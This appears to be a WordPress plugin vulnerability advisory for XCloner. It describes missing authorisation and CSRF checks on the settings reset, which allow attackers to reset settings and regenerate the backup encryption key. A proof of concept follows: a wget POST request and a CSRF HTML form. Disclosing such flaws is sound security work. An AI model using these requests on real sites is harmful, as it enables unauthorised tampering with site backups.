The plugin does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key. v4.3.5 added capability check, but CSRF one still missing.
v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O- v < 4.3.6 (via CSRF): <form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST"> <input type="text" name="xcloner_restore_defaults" value="1"> <input type="submit" value="Submit"/> </form>
Krzysztof Zając
Krzysztof Zając
Yes
2022-06-06 (about 2 months ago)
2022-06-06 (about 2 months ago)
2022-06-21 (about 1 months ago)